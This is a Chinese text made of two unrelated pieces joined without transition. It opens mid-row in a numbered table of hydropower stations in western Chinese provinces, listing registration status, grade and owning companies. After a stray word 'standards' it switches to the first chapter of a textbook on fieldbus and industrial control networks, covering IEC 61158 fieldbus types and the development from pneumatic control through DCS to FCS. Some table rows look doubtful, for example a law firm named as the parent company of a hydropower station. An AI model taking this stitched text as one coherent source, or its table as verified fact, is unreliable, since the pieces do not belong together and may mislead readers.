乙级 景谷威远江水电站开发经营有限公司 贵州鑫凯龙城房地产开发有限公司 地方企业 连续乙级 545 乌东德 云南 备案 / 中国长江电力股份有限公司乌东德水力发电厂 中国长江电力股份有限公司 中国三峡集团 546 乌弄龙 云南 注册 甲级 华能澜沧江水电股份有限公司乌弄龙里底水电厂 华能澜沧江水电股份有限公司 中国华能 547 西洱河二级 云南 注册 甲级 云南电力试验研究院(集团)有限公司 云南电网有限责任公司 南方电网 548 西洱河三级 云南 注册 甲级 云南电力试验研究院(集团)有限公司 云南电网有限责任公司 南方电网 549 西洱河四级 云南 注册 甲级 云南电力试验研究院(集团)有限公司 云南电网有限责任公司 南方电网 550 西洱河一级 云南 注册 甲级 云南电力试验研究院(集团)有限公司 云南电网有限责任公司 南方电网 551 小湾 云南 注册 甲级 华能澜沧江水电股份有限公司小湾水电厂 华能澜沧江水电股份有限公司 中国华能 552 小岩头 云南 注册 甲级 云南滇能会泽牛栏江水电开发有限公司 国家电投集团云南国际电力投资有限公司 国家电投 553 徐村 云南 注册 甲级 华能大理水电有限责任公司 华能澜沧江水电股份有限公司 中国华能 554 崖羊山 云南 注册 甲级 云南大唐国际李仙江流域水电开发有限公司 大唐云南发电有限公司 中国大唐 555 燕子坡 云南 备案 / 盐津燕子坡发电有限公司 四川宜宾伊力集团横江发电有限公司 地方企业 556 杨柳滩 云南 注册 甲级 水富杨柳滩发电有限公司 四川能投发展股份有限公司 地方企业 557 以礼河二级 云南 注册 甲级 华电云南发电有限公司以礼河发电厂 华电云南发电有限公司 中国华电 558 以礼河三级 云南 注册 甲级 华电云南发电有限公司以礼河发电厂 华电云南发电有限公司 中国华电 559 以礼河四级 云南 注册 甲级 华电云南发电有限公司以礼河发电厂 华电云南发电有限公司 中国华电 560 以礼河一级 云南 注册 甲级 华电云南发电有限公司以礼河发电厂 华电云南发电有限公司 中国华电 561 油房沟 云南 注册 甲级 云南昭通高桥发电有限公司 云南恒安电力工程有限公司 南方电网 562 云鹏 云南 注册 甲级 云南华润电力(红河)有限公司 华润电力投资有限公司华南分公司 华润电力 563 DG 西藏 备案 / 华电西藏能源有限公司DG水电分公司 华电西藏能源有限公司 中国华电 564 JC 西藏 注册 甲级 华能西藏雅鲁藏布江水电开发投资有限公司JC水电厂 华能西藏雅鲁藏布江水电开发投资有限公司 中国华能 565 ZM 西藏 注册 甲级 华能西藏雅鲁藏布江水电开发投资有限公司ZM水电厂 华能西藏雅鲁藏布江水电开发投资有限公司 中国华能 566 查龙 西藏 注册 乙级 国网西藏电力有限公司那曲供电公司 国网西藏电力有限公司 国家电网 连续乙级 567 多布 西藏 注册 甲级 国家能源集团西藏尼洋河流域水电开发有限公司 国家能源集团西藏电力有限公司 国家能源集团 568 果多 西藏 注册 甲级 西藏开投果多水电有限公司 西藏开发投资集团有限公司 地方企业 569 金河 西藏 注册 甲级 国网西藏电力有限公司昌都供电公司 国网西藏电力有限公司 国家电网 570 金桥 西藏 注册 乙级 西藏开投金桥水电开发有限公司 西藏开发投资集团有限公司 地方企业 571 老虎嘴 西藏 注册 甲级 国网西藏电力有限公司巴河发电公司 国网西藏电力有限公司 国家电网 572 狮泉河 西藏 注册 乙级 国网西藏阿里供电有限公司 国网西藏电力有限公司 国家电网 连续乙级 573 瓦托 西藏 注册 甲级 西藏开投金河流域水电开发有限公司 西藏开发投资集团有限公司 地方企业 574 羊湖枢纽 西藏 注册 甲级 国网西藏电力有限公司拉萨发电公司 国网西藏电力有限公司 国家电网 575 直孔 西藏 注册 甲级 国网西藏电力有限公司拉萨发电公司 国网西藏电力有限公司 国家电网 576 安康 陕西 注册 甲级 安康水力发电厂 国网陕西省电力有限公司 国家电网 577 白河(夹河) 陕西 备案 / 中广核汉江水电开发有限公司 中广核能源开发有限责任公司 中广核 未按计划注册 578 蔺河口 陕西 注册 甲级 陕西岚河水电开发有限责任公司 陕西省水电开发有限责任公司 地方企业 579 石泉 陕西 注册 甲级 大唐陕西发电有限公司石泉水力发电厂 大唐陕西发电有限公司 中国大唐 580 蜀河 陕西 注册 甲级 陕西汉江投资开发有限公司蜀河水力发电厂 大唐陕西发电有限公司 中国大唐 581 天生桥 陕西 注册 甲级 陕西省水电开发有限责任公司二郎坝发电公司 陕西省水电开发有限责任公司 地方企业 582 喜河 陕西 注册 甲级 陕西汉江投资开发有限公司喜河水力发电厂 大唐陕西发电有限公司 中国大唐 583 旬阳 陕西 备案 / 大唐陕西发电有限公司旬阳水力发电厂 大唐陕西发电有限公司 中国大唐 584 八盘峡 甘肃 注册 甲级 甘肃盐锅峡发电有限公司 国家电投集团黄河上游水电开发有限责任公司 国家电投 585 白龙江沙湾 甘肃 注册 乙级 陇南汇鑫水电股份有限公司 甘肃言中律师事务所 地方企业 连续乙级 586 宝瓶河 甘肃 注册 甲级 甘肃电投河西水电开发有限责任公司 甘肃省电力投资集团有限责任公司 地方企业 587 碧口 甘肃 注册 甲级 大唐甘肃发电有限公司碧口水力发电厂 大唐甘肃发电有限公司 中国大唐 588 炳灵 甘肃 注册 甲级 甘肃电投炳灵水电开发有限责任公司 甘肃省电力投资集团有限责任公司 地方企业 589 柴家峡 甘肃 注册 甲级 甘肃柴家峡水电有限公司 中核兰州铀浓缩有限公司 中核集团 590 橙子沟 甘肃 注册 甲级 甘肃电投大容电力有限责任公司 甘肃省电力投资集团有限责任公司 地方企业 591 达拉河口 甘肃 注册 甲级 国能达拉河水电开发有限公司 国家能源集团甘肃电力有限公司 国家能源集团 592 大孤山 甘肃 注册 乙级 甘肃黑河清洁能源股份有限公司 甘肃黑河水电实业投资有限责任公司 地方企业 连续乙级 593 大峡 甘肃 注册 甲级 国投甘肃小三峡发电有限公司 国投电力控股股份有限公司 国投电力 594 代古寺 甘肃 注册 甲级 国能陕西水电有限公司 国家能源集团陕西电力有限公司 国家能源集团 595 东水峡 甘肃 注册 甲级 肃南裕固族自治县东水峡水电开发有限责任公司 酒泉市三元水电开发有限公司 地方企业 596 海甸峡 甘肃 注册 甲级 甘肃电投九甸峡水电开发有限责任公司 甘肃省电力投资集团有限责任公司 地方企业 597 汉坪嘴 甘肃 注册 甲级 甘肃明珠南部水电开发有限公司 甘肃电力明珠集团有限公司 国家电网 598 河口 甘肃 注册 甲级 甘肃电投炳灵水电开发有限责任公司 甘肃省电力投资集团有限责任公司 地方企业 599 花园 甘肃 注册 甲级 甘肃电投大容电力有限责任公司 甘肃省电力投资集团有限责任公司 地方企业 600 九甸峡 甘肃 注册 甲级 甘肃电投九甸峡水电开发有限责任公司 甘肃省电力投资集团有限责任公司 地方企业 601 九龙峡 甘肃 注册 甲级 迭部九龙峡水电开发有限公司 甘肃电力明珠集团有限公司 国家电网 602 莲麓 甘肃 注册 甲级 甘肃电投九甸峡水电开发有限责任公司 甘肃省电力投资集团有限责任公司 地方企业 603 凉风壳 甘肃 注册 甲级 国能陕西水电有限公司 国家能源集团陕西电力有限公司 国家能源集团 604 刘家峡 甘肃 注册 甲级 国网甘肃省电力公司刘家峡水电厂 国网甘肃省电力公司 国家电网 605 龙首二级 甘肃 注册 甲级 甘肃电投河西水电开发有限责任公司 甘肃省电力投资集团有限责任公司 地方企业 606 龙首一级 甘肃 注册 甲级 甘肃电投河西水电开发有限责任公司 甘肃省电力投资集团有限责任公司 地方企业 607 苗家坝 甘肃 注册 甲级 大唐甘肃发电有限公司碧口水力发电厂 大唐甘肃发电有限公司 中国大唐 608 麒麟寺 甘肃 注册 甲级 大唐甘肃发电有限公司碧口水力发电厂 大唐甘肃发电有限公司 中国大唐 609 青羊沟 甘肃 注册 甲级 玉门市宏远实业有限责任公司 甘肃省农垦集团有限责任公司 地方企业 610 三道湾 甘肃 注册 甲级 甘肃电投河西水电开发有限责任公司 甘肃省电力投资集团有限责任公司 地方企业 611 水泊峡 甘肃 注册 甲级 甘肃电投大容电力有限责任公司 甘肃省电力投资集团有限责任公司 地方企业 612 锁儿头 甘肃 注册 甲级 甘肃明珠舟曲水电开发有限公司 甘肃电力明珠集团有限公司 国家电网 613 天王沟 甘肃 注册 甲级 甘肃电投大容电力有限责任公司 甘肃省电力投资集团有限责任公司 地方企业 614 铁城 甘肃 注册 甲级 甘肃明珠水电开发有限公司大通河水电分公司 甘肃电力明珠集团有限公司 国家电网 615 乌金峡 甘肃 注册 甲级 国投甘肃小三峡发电有限公司 国投电力控股股份有限公司 国投电力 616 喜儿沟 甘肃 注册 甲级 华能舟曲水电开发有限公司 华能甘肃水电开发有限公司 中国华能 617 小孤山 甘肃 注册 甲级 甘肃张掖小孤山水电有限责任公司 甘肃黑河水电实业投资有限责任公司 地方企业 618 小峡 甘肃 注册 甲级 国投甘肃小三峡发电有限公司 国投电力控股股份有限公司 国投电力 619 盐锅峡 甘肃 注册 甲级 甘肃盐锅峡发电有限公司 国家电投集团黄河上游水电开发有限责任公司 国家电投 620 班多 青海 注册 甲级 青海黄河上游水电开发有限责任公司班多发电分公司 国家电投集团黄河上游水电开发有限责任公司 国家电投 621 大河家 青海 注册 甲级 青海省三江水电开发有限责任公司大河家分公司 青海省三江水电开发有限责任公司 国电投 622 尕曲 青海 注册 乙级 兴海尕曲水电开发有限公司 兴海尕曲水电开发有限公司 地方企业 连续乙级 623 公伯峡 青海 注册 甲级 青海黄河上游水电开发有限责任公司公伯峡发电分公司 国家电投集团黄河上游水电开发有限责任公司 国家电投 624 黄丰 青海 备案 / 青海省三江水电开发有限责任公司黄丰分公司 青海省三江水电开发有限责任公司 国电投 未按计划注册 625 积石峡 青海 注册 甲级 青海黄河上游水电开发有限责任公司积石峡发电分公司 国家电投集团黄河上游水电开发有限责任公司 国家电投 626 金沙峡 青海 注册 甲级 青海黄河中型水电开发有限责任公司 国家电投集团黄河上游水电开发有限责任公司 国家电投 627 康扬 青海 注册 甲级 青海诚扬水电有限公司 青海省三江水电开发有限责任公司 国电投 628 拉西瓦 青海 注册 甲级 青海黄河上游水电开发有限责任公司拉西瓦发电分公司 国家电投集团黄河上游水电开发有限责任公司 国家电投 629 李家峡 青海 注册 甲级 青海黄河上游水电开发有限责任公司李家峡发电分公司 国家电投集团黄河上游水电开发有限责任公司 国家电投 630 龙羊峡 青海 注册 甲级 青海黄河上游水电开发有限责任公司龙羊峡发电分公司 国家电投集团黄河上游水电开发有限责任公司 国家电投 631 纳子峡 青海 注册 甲级 青海黄河中型水电开发有限责任公司 国家电投集团黄河上游水电开发有限责任公司 国家电投 632 尼那 青海 注册 甲级 水电四局投资开发有限公司尼那电厂 中国水利水电第四工程局投资有限公司 中国电建 633 石头峡 青海 注册 乙级 青海雪玉水电有限责任公司 青海省水利水电(集团)有限责任公司 地方企业 634 苏只 青海 注册 甲级 青海黄河上游水电开发有限责任公司公伯峡发电分公司 国家电投集团黄河上游水电开发有限责任公司 国家电投 635 直岗拉卡 青海 注册 甲级 青海大唐国际直岗拉卡水电开发有限公司 大唐青海能源开发有限公司 中国大唐 636 青铜峡 宁夏 注册 甲级 宁夏黄河水电青铜峡发电有限公司 国家电投集团黄河上游水电开发有限责任公司 国家电投 637 别迭里 新疆 注册 乙级 华能新疆能源开发有限公司托什干河水电分公司 华能新疆能源开发有限公司 中国华能 连续乙级 638 布仑口 新疆 注册 甲级 广西水利电业集团新疆克州水利发电有限公司 广西农村投资集团发电有限公司 地方企业 639 察汗乌苏 新疆 注册 甲级 国家能源集团新疆开都河流域水电开发有限公司 国家能源集团新疆能源有限责任公司 国家能源集团 640 冲乎尔 新疆 注册 乙级 新疆新华水电投资股份有限公司阿勒泰事业部 新疆新华水电投资股份有限公司 中核集团 641 达克曲克 新疆 注册 甲级 新疆华电和田水电有限责任公司 华电新疆发电有限公司 中国华电 642 大山口 新疆 注册 甲级 新疆新能发展有限责任公司大山口水力发电厂 新疆新能发展有限责任公司 国家电网 643 哈德布特 新疆 注册 甲级 新疆富蕴爱众能源发展有限公司 四川广安爱众股份有限公司 地方企业 644 吉林台二级 新疆 备案 / 新疆伊犁河流域开发建设管理局吉林台二级枢纽管理处 新疆伊犁河流域开发建设管理局 地方企业 未按计划注册 645 吉林台一级 新疆 注册 甲级 国家能源集团新疆吉林台水电开发有限公司 国家能源集团新疆能源有限责任公司 国家能源集团 646 柯赛依 新疆 注册 乙级 新疆阿勒泰华宁水电投资开发有限公司 浙江华宁投资有限公司 地方企业 647 库什塔依 新疆 注册 甲级 新疆伊犁库克苏河水电开发有限公司 国家电投集团新疆能源化工有限责任公司 国家电投 648 柳树沟 新疆 注册 甲级 国家能源集团新疆开都河流域水电开发有限公司 国家能源集团新疆能源有限责任公司 国家能源集团 649 玛纳斯河一级 新疆 备案 / 玛纳斯天富水利发电有限公司 新疆天富能源股份有限公司 地方企业 650 尼勒克一级 新疆 注册 甲级 国家能源集团新疆吉林台水电开发有限公司 国家能源集团新疆能源有限责任公司 国家能源集团 651 齐热哈塔尔 新疆 注册 甲级 新华喀什齐热哈塔尔水电开发有限公司 新疆新华水电投资股份有限公司 中核集团 652 恰木萨 新疆 备案 / 新疆新华恰木萨水电开发有限公司 新疆新华水电投资股份有限公司 中核集团 未按计划注册 653 萨里克特 新疆 注册 甲级 国家能源集团新疆吉林台水电开发有限公司 国家能源集团新疆能源有限责任公司 国家能源集团 654 沙尔布拉克 新疆 注册 甲级 新疆华电沙尔布拉克水电有限责任公司 华电新疆发电有限公司 中国华电 655 斯木塔斯 新疆 注册 甲级 葛洲坝伊犁水电开发有限公司 中国葛洲坝集团机电建设有限公司 中国能建 656 塔勒德萨依 新疆 注册 甲级 国家能源集团新疆吉林台水电开发有限公司 国家能源集团新疆能源有限责任公司 国家能源集团 657 塔日勒嘎 新疆 注册 乙级 克州新隆能源开发有限公司 中电建水电开发集团有限公司 中国电建 连续乙级 658 铁门关 新疆 注册 甲级 新疆巴电建设安装有限责任公司铁门关发电分公司 新疆巴电建设安装有限责任公司 国家电网 659 托海 新疆 注册 甲级 新疆新能发展有限责任公司托海水力发电厂 新疆新能发展有限责任公司 国家电网 660 温泉 新疆 注册 甲级 国家能源集团新疆吉林台水电开发有限公司 国家能源集团新疆能源有限责任公司 国家能源集团 661 小石峡 新疆 注册 甲级 国能新疆阿克苏水电开发有限公司 国家能源集团新疆能源有限责任公司 国家能源集团 662 錾高 新疆 备案 / 新疆新华錾高水电开发有限公司 新疆新华水电投资股份有限公司 中核集团
standards
现场总线及工业控制网络 第1章 概述 1.1现场总线与控制网络简介 1.1.1现场总线 1.现场总线的定义 在工业数据通信领域,总线是指由导线组成的传输线束,连接多个传感器和执行器,实现各部件之间传送信息的公共通信干线。导线介质可以是有线介质,也可以是无线介质。总线上除了传输测量控制的数值外,还可传输设备状态、参数调整和故障诊断等信息。由于串行通信具有通信方便、经济和安装简便的优点,因此,节点众多的工业数据通信系统一般都采用串行通信方式。现场总线是当今自动化技术发展的热点之一,被称为自动化领域的计算机局域网。现场总线的出现,标志着自动化技术跨入了一个新的时代,对该领域的技术发展产生了重要的影响。过去对现场总线有很多种不同的定义,国际电工技术委员会(InternationalElectrotechnicalCommission,IEC)在IEC61158中给现场总线的定义是:安装在制造或过程区域的现场装置与控制室内的自动控制装置之间的数字式、串行、多点通信的数据总线。可以认为它是关于现场总线的标准定义。在该定义中,首先说明了它的主要使用场合,即制造业自动化、批量流程控制、过程控制等领域;其次说明了系统中的主要角色是现场的自动装置和控制室内的智能化自动控制装置;第三点说明它是一种数据总线技术,即一种通信协议,而且该通信是数字式、串行、多节点的。这三点结合起来描述了现场总线技术中最实质性的内容。 2.现场总线的分类 一般在工业生产过程中,除了计算机及其外围设备,还存在大量检测工艺参数数值与状态的变送器和控制生产过程的控制设备。这些设备的各功能单元之间、设备与设备之间以及这些设备与计算机之间遵照通信协议,利用数据传输技术传递数据信息的过程,称为工业数据通信。工业数据通信系统的规模从简单到复杂,从两三个数据节点到成千上万台设备,各类应用俱全。在工业数据通信领域中,人们通常按数据通信帧的长短,把数据传输总线分为传感器总线、设备总线和现场总线。传感器总线属于数据位级的总线,其通信帧的长短只有几个或十几个数据位,如后续章节要介绍的AS⁃i(ActuatorSensorInterface)总线。设备总线属于字节级的总线,其通信帧的长度一般为几个到几十个字节,如后续章节要介绍的CAN(Con⁃trollerAreaNetwork)总线。而现场总线则属于数据块级的总线,它所传输的数据块长度可达几百个字节,当要传输的数据块更长时,可支持打包分批传送。但现场总线中传输的与控制直接相关的数据帧的长度一般也只有几个到几十个字节,例如后续章节要介绍的FoundationFieldbus、PROFIBUS等都属于典型的现场总线。通常,习惯上把以上几种数据长度不一的总线统称为现场总线。 3.现场总线的核心及基础 现场总线的核心是总线协议。虽然目前现场总线协议并不统一,但是对于各种总线,协议的基本原理都是一样的,都是为了实现串行双向数字化通信。每一种总线协议,只要其协议已经确定,则包括通信速度、节点容量、各系统相关的网关、网桥、体系结构、现场智能仪表及网络供电方式等在内的相关的关键技术和软硬件设备也都会确定。由于现场总线是众多仪表之间的接口,在实际应用过程中也希望现场总线满足可互操作性的要求。因此,对于一个开放的现场总线而言,一个标准化的总线协议尤为重要,可以说标准化的总线协议是现场总线的核心。现场总线的基础是现场总线仪表,或称为智能现场设备。现场总线技术的发展带来了总线仪表在通信及检测控制功能上的革新,微电子技术的发展也为仪表的智能发展带来了技术支撑。智能仪表采用超大规模集成电路设计,利用嵌入式软件协调内部操作,在完成输入信号的非线性补偿、温度补偿、故障诊断的基础上,还可完成对工业过程的控制,使控制系统的功能进一步分散,同时还可以保障数据处理的质量,提高系统的抗干扰性能。现场智能仪表使传感器由单一功能、单一检测向多功能和多变量检测发展,由被动信号转换向主动控制转变和主动进行信息处理的方向发展,且数据处理具有较高的线性度和较低的漂移,使传感器由孤立的元件向系统化、网络化方向发展,降低了系统的复杂性,简化了 系统结构。正是由于现场仪表智能化的发展和改善,它已经成为现场总线控制系统有力的硬件支撑,是现场总线控制系统的基础。目前,现场仪表包括多类工业产品,如过程量类的压力、温度、流量、振动、转速仪表、各种转化器或变送器、现场的可编程序控制器(ProgrammableLogicController,PLC)和远程的单回路或多回路调节器等;数字量类的自动识别器、ON⁃OFF开关、光电传感器,还包括控制阀和执行器等。主要的应用领域包括交通领域、过程控制领域、制造领域和物业领 域等。目前,已开发的多功能智能化现场仪表产品中包含有通信功能、多变量检测功能、提供诊断信息的功能、复合控制功能和信息的差错检测等一些常用功能。现场总线智能仪表是未来工业过程控制系统的主流仪表,它与现场总线组成了现场总线控制系统(FCS)的两个重要部分,将会给传统控制系统结构和方法带来革命性的变化。 4.现场总线的发展现状 国际电工技术委员会/国际标准化协会(IEC/ISA)于1984年开始着手现场总线标准化工作,但统一的标准至今仍未完成。世界上许多国家都提出了自己的现场总线技术,但是由于存在太多标准和协议的差异,给工程实践和应用推广带来了诸多不便,影响了系统的开放性和互操作性,因而IEC在最近几年里开始标准统一工作,减少现场总线协议的数量,以达到单一标准协议的目标。各种协议标准合并的目的是为了达成国际上统一的总线标准,以实现各家产品的互操作性。 IECTC65(负责工业测量和控制的第65标准化技术委员会)以1999年年底通过的8种类型的现场总线作为IEC61158最早的国际标准。最新的IEC61158标准(第四版)于2007年7月发布。 IEC61158第四版由多个部分组成,主要包括以下内容: IEC61158⁃1总论与导则; IEC61158⁃2物理层服务定义域协议规范; IEC61158⁃300数据链路层服务定义; IEC61158⁃400数据链路层协议规范; IEC61158⁃500应用层服务定义; IEC61158⁃600应用层协议规范。 IEC61158第四版标准包括的现场总线类型如下: Type1IEC61158(FF的H1)技术报告; Type2CIP现场总线; Type3PROFIBUS现场总线; Type4P⁃Net现场总线; Type5FFHSE现场总线; Type6SwiftNet现场总线(被撤销); Type7WorldFIP现场总线; Type8INTERBUS现场总线; Type9FFH1以太网; Type10PROFINET实时以太网; Type11TCnet实时以太网; Type12EtherCAT实时以太网; Type13EthernetPowerlink实时以太网; Type14EPA实时以太网; Type15Modbus⁃RTPS实时以太网; Type16SERCOSⅠ、Ⅱ现场总线; Type17VNET/IP实时以太网; Type18CC⁃Link现场总线; Type19SERCOSⅢ现场总线; Type20HART现场总线。 用于工业测量与控制系统的EPA(EthernetforPlantAutomation),其系统结构与通信规范是由浙江大学中控技术股份有限公司、中国科学院沈阳自动化研究所、重庆邮电大学、清华大学、大连理工大学等单位联合制定的用于工厂自动化的实时以太网通信标准。EPA标准在2005年2月经国际电工委员会IEC/TC65/SC65C投票通过,已作为公共可用规范(PublicAvailableSpecification,PAS)IEC/PAS62409标准化文件正式发布,并作为公共行规(CommonProfileFamily14,CPF14)列入正在制定的实时以太网应用行规国际标准IEC61748⁃2,2005年12月正式进入IEC61158第四版标准,成为IEC61158⁃314/414/514/614规范。每种总线都有其产生的背景和应用领域。总线是为了满足自动化发展的需求而产生的,由于不同领域的自动化需求各有其特点,因此在某个领域中产生的总线技术一般对这一领域的满足度高一些,应用多一点,适应性好一些。工业以太网的引入成为新的热点。工业以太网正在工业自动化和过程控制市场上迅速增长,几乎所有远程I/O接口技术的供应商均提供一个支持TCP/IP的以太网接口,如西门子(Siemens)、罗克韦尔(Rockwell)、通用电气(GE)、发那科(FANUC)等,他们销售各自的控制产品及系统解决方案,一般都提供远程I/O与基于PC的控制系统相连的以太网接口。 1.1.2控制网络 1.控制系统的发展历程与控制网络的兴起 随着科学技术的迅猛发展,控制系统在19、20世纪里发生了巨大的变革。150多年前出现的基于气动信号标准的气动控制系统(PneumaticControlSystem,PCS)标志着控制理论及控制系统的初步形成。纵观控制系统的发展过程,大致可以分为如下几个阶段。 (1)基地式和单元组合式的气动、液动仪表控制阶段20世纪50年代以前,控制系统中主要采用以气动和液动为主的仪表作为控制装置,组成基地式和单元组合式两种结构。基地式的特点是仪表的所有部件之间以不可分离的机械结构相连接,装在一个箱壳内,利用一台仪表,如温度控制器、压力控制器、流量控制器、液位控制器等就能解决一个简单自动化系统的测量、记录、控制等全部问题。单元组合式控制器包括变送、调节、运算、显示、执行等单元。 (2)集中式电动模拟仪表阶段由于基地式和单元组合式的气动、液动仪表仅具备简单的测控功能,信号只能在本仪表内起作用,不具备仪表间数据传输功能,因此,随着生产规模的扩大,出现了电动系列的单元组合式仪表。这种仪表采用统一的模拟信号,如4~20mA的直流电流信号、1~5V的直流电压信号,将生产现场各处的数据送往集中控制室。操作人员不用通过生产现场巡视,直接坐在控制室内就可以实现对生产过程的操作和控制。 (3)以PLC为核心的逻辑控制和顺序控制阶段20世纪60年代出现了可编程序控制器(PLC),PLC一出现便得到了快速发展,给工业自动化领域带来了巨大变革。由于其具有使用方便、编程简单、价位较低、可靠性高、适应性和抗干扰能力强等优点,因此,无论是简单的顺序控制系统,还是复杂的过程控制和运动控制系统,PLC扮演的角色都无可替代。 以PLC为核心的逻辑控制和顺序控制方式主要用于以开关量为主且控制环境恶劣的 场合。 (4)以计算机为控制核心的计算机控制系统阶段计算机控制系统(ComputerControlSystem,CCS)是应用计算机参与控制,借助一些辅助部件与被控对象相联系,以获得一定控制目的而构成的系统。这里的计算机通常指数字计算机,可以是各种规模,如从微型到大型的通用或专用计算机。辅助部件主要指输入输出接口、检测装置和执行装置等。与被控对象及部件间的联系,可以是有线方式或无线方式,如通过电缆的模拟信号或数字信号进行联系,或用红外线、微波、无线电波、光波等进行联系。在以计算机为控制核心的计算机控制系统中,主要包括以下几个典型的应用系统。 1)数据采集系统(DataAcquisitionSystem,DAS)。在这种应用中,计算机只承担数据的采集与处理工作,而不直接参与控制。该系统对生产过程各种工艺变量进行巡回检测、处理、记录及发出变量的超限报警,同时对这些变量进行累计分析和实时分析,从而得出各种趋势分析数据,为操作人员提供参考。 2)直接数字控制(DirectDigitalControl,DDC)系统。DDC系统是用一台计算机对被控参数进行检测,再根据设定值和控制算法进行运算,然后输出到各执行机构对生产进行控制。直接数字控制系统是利用计算机的分时处理功能直接对多个控制回路实现多种形式控制的多功能数字控制系统。在这类系统中,计算机的输出直接作用于控制对象,故称为直接数字控制。计算机根据控制规律进行运算,然后将结果经过过程输出通道作用于被控对象,从而使被控变量符合所要求的性能指标。数字系统与模拟系统不同之处在于,在模拟系统中,信号的传送不需要数字化,而数字系统必须先进行模⁃数转换,输出控制信号也必须进行数⁃模转换,然后才能驱动执行机构。因为计算机有较强的计算能力,所以控制算法的改变很方便。直接数字控制系统具有在线实时控制、分时方式控制、多功能性这三个特点。由于计算机直接承担控制任务,所以要求其实时性好、可靠性高、适应性强。 3)监督计算机控制(SupervisoryComputerControl,SCC)系统。SCC系统是指利用计算机对工业生产过程进行监督管理和控制的数字控制系统。计算机监督控制系统是在操作指导系统的基础上发展起来的。操作指导系统是一种开环控制结构,系统中计算机的作用是定时采集生产过程参数,按照工艺要求或指定的控制算法求出输入输出关系和控制量,并通过打印、显示和报警提供现场信息,以便管理人员对生产过程进行分析或以手动方式相应地调节控制量(给定值)去控制生产过程。监督控制系统在输入计算方面与操作指导系统基本相同,不同的是监督控制系统计算机的输出可不经过系统管理人员的参与而直接通过过程通道按指定方式对生产过程施加影响。因此,计算机监督控制系统具有闭环形式的结构,而且监控计算机具有较复杂的控制功能,它可以根据生产过程的状态、环境、条件等因素,按事先规定的控制模型计算出生产过程的最优给定值,并据此对模拟式调节仪表或下一级直接数字控制系统进行自动整定,也可以进行顺序控制、最优控制以及自适应控制计算,使生产过程始终处于最优工作状况下。监督控制的内容极为广泛,包括控制功能、操作指导、管理控制和修正模型等。这个系统根据生产过程的工况和已定的数学模型,进行优化分析计算,产生最优化设定值,送给直接数字控制系统执行。监督计算机系统承担着高级控制与管理任 务,要求数据处理功能强、存储容量大等,一般采用较高档微机。 (5)以大规模集成电路和微型处理机为基础的DCS控制集散控制系统(DistributedControlSystem,DCS)是为了克服集中控制系统易失控、可靠性低的弊端而随之产生发展起来的控制系统。 集散控制系统又称为分布式控制系统。在集中型计算机控制系统中,一台主机往往要控制十几个甚至几十个回路,一旦该计算机出现故障,系统危险集中,会对生产带来很大影响。为了提高系统的安全性和可靠性,可将系统的控制权进行分级和分散。随着大规模集成电路及微型计算机技术的迅速发展,采用多个微型处理机为基础的现场控制站各自实现“分散控制”。通过计算机网络形成的高速数据通道,将所有过程信息传送到上位计算机,以便对生产过程进行集中监视和管理,从而构成了以“集中管理、分散控制”为核心的集散型计算机控制系统。其实质是利用计算机技术、信号处理技术、测量控制技术、通信网络技术和人机接口技术等对生产过程进行分散控制与集中监视、操作和管理的一种控制概念和系统工程技术。 1)DCS的产生及发展历程。DCS是在集中式控制系统的基础上发展演变而来的。它的设计思想是“集中管理、分散控制”,与传统的集中式控制系统相比,控制系统的危险被分散,可靠性大大增强,具有显著的优越性。DCS系统经过20多年的发展和变迁,主要经历了4个阶段。20世纪70年代为初创期,80年代为成熟期,90年代由于计算机技术的快速发展,DCS硬件和软件都采用了一系列高新技术,使DCS向更高层次发展,出现了第三代DCS。DCS发展到第三代,尽管采用了一系列新技术,但是,生产现场层仍然没有摆脱常规模拟检测仪表和执行机构的状况,因而制约了它的发展。为实现DCS的变革,人们将现场模拟仪表改为现场数字仪表,并用现场总线实现互联。由此带来DCS控制站的变革,将控制站内的功能块分散地分布在各台现场数字仪表中,并可统一组态构成控制回路,彻底实现分散控制。20世纪90年代,现场总线技术的发展,现场总线国际标准的形成及现场总线数字仪表的生产,标志着新一代DCS的产生,即现场总线控制系统(FieldbusControlSystem,FCS)。 2)DCS的特点。 ①自治性。DCS的自治性是指DCS的组成部分均可独立地工作,各控制站均可独立自主地完成所分配的规定任务,操作站能自主地实现监控和管理功能。 ②协调性。DCS各工作站之间采用实时性的、安全可靠的通信网络传送各种信息并协调工作,以完成控制系统的总体功能和优化处理,实现整个系统信息共享。 ③灵活性。DCS的硬件和软件均采用开放式、标准化和模块化设计,系统可根据用户需要进行灵活配置。当需要改变控制流程时,通过组态软件及操作可改变系统的控制结构和便于系统的灵活扩充。 ④分散性。DCS的分散性包含地域的分散、设备的分散、功能的分散、电源的分散和危险的分散等含义,而分散的最终目的还是为了将危险分散,进而提高系统的安全性和可靠性。 ⑤便捷性。DCS操作方便,显示直观。其简洁的人机对话系统、CRT交互显示技术等使得系统具有便捷性和实用性。 ⑥可靠性。DCS的生命力在于高可靠性、高安全性和高效率。为了保证DCS控制系统的可靠性,对系统结构采用容错设计,所有硬件采用冗余设计,软件采取容错设计、“电磁兼容设计”(指抗干扰能力与系统内外的干扰相适应,并留有充分的余地,以保证系统的可靠性)以及在线快速排查故障的设计等。 (6)以微芯片技术为核心、智能仪表为基础的FCS控制现场总线控制系统(FCS)是在计算机和网络技术的飞速发展下而迅猛发展起来的控制系统。传统的过程控制系统中,仪器设备与控制器设备之间是点对点的连接,现场总线控制系统中现场设备多点共享总线,不仅节约了连线,而且实现了通信链路的多点信息传输。从物理结构上来说,现场总线控制系统主要由现场设备(智能化设备或仪表、现场CPU、外围电路等)和传输介质(双绞线、同轴电缆、光纤等)组成。 1)FCS的技术特点。 ①系统的开放性。通信标准的公开、一致性使系统具备开放性。现场总线既可以与同层网络互联,也可以与不同层网络互联,各不同厂商设备之间也可以互联,还可实现网络数据库的共享。开放系统把选择设备进行系统集成的权力交给了用户,用户可以按自己的需求把来自不同厂商的产品组成任意大小的系统。 ②互操作性与互用性。互操作性是指互联设备之间、系统间的信息传递与沟通;互用性意味着用户选择的不同厂商或不同型号的产品、设备之间具有互换性。 ③系统结构的分散性。现场总线已构成一种新的全分布式系统的体系结构,把DCS控制站的功能块分散地分配给现场的仪表,从而构成了虚拟控制站,彻底实现了分散控制,从根本上改变了现有DCS集中与分散相结合的集散控制系统,简化了系统结构,提高了系统可靠性和现场设备的适应性。 ④现场设备的智能化与自治性。FCS将传感测量、补偿计算、工程量处理与控制等功能分散到现场设备中完成,仅靠现场设备即可完成自动控制的基本功能,可随时诊断设备的运行状态。 2)FCS的发展背景与趋势。FCS作为第5代控制系统体系结构,体现了其分布、开放、互联、高可靠性的特点。 